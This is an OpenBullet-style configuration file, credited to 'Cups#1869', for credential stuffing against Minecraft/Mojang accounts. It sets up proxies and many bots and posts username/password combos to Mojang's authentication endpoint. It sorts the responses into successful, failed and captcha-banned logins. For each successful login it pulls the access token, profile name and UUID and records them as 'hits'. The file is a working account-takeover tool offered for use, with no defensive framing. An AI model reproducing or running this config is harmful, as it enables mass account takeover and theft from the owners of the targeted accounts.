[SETTINGS]
{
  "Name": "Minecraft by Cups#1869",
  "SuggestedBots": 170,
  "MaxCPM": 0,
  "LastModified": "2021-11-11T13:52:19.2795807+01:00",
  "AdditionalInfo": "",
  "Author": "Cups#1869",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://authserver.mojang.com/authenticate" 
  CONTENT "{\"captcha\":\"\",\"captchaSupported\":\"\",\"password\":\"<PASS>\",\"requestUser\":true,\"username\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 208" 
  HEADER "Host: authserver.mojang.com" 
  HEADER "Origin: https://www.minecraft.net" 
  HEADER "Referer: https://www.minecraft.net/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: cross-site" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "accessToken" 
    KEY "\"registrationCountry\"" 
    KEY "\":\"preferredLanguage\",\"" 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials. Invalid username or password." 
  KEYCHAIN Ban OR 
    KEY "Please solve this puzzle so we" 

PARSE "<SOURCE>" JSON "accessToken" -> VAR "token" 

REQUEST GET "https://api.minecraftservices.com/minecraft/profile" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <token>" 

PARSE "<SOURCE>" LR " \"name\" : \"" "\"" CreateEmpty=FALSE -> CAP "username" 

REQUEST GET "https://api.mojang.com/users/profiles/minecraft/<username>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "\",\"id\":\"" "\"" -> VAR "uuid" 

FUNCTION Constant "Cups#1869" -> CAP "config made by" 

FUNCTION Constant -> VAR "Assistant" 

UTILITY File "MCHits.txt" Read -> CAP "HITS" 

